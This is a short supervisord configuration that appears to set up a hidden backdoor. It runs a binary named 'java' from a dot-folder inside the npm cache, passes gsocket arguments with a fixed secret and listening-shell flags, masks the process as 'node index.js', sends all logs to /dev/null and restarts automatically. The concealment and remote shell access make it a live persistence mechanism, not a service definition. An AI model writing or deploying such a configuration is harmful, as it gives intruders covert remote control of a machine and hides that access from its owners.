[supervisord]
logfile=/dev/null

[program:gnet]
directory=/var/www/.npm/_cacache/content-v2/sha512/.c0
environment=GSOCKET_ARGS="-s i0D7a1E9X-6A1f3d2G4h7-5k1A0e7F9d8A3-6a1C5j1g7 -liq"
command=./java -a '/usr/bin/node index.js' ./bot.jar 
stdout_logfile=/dev/null
autorestart = true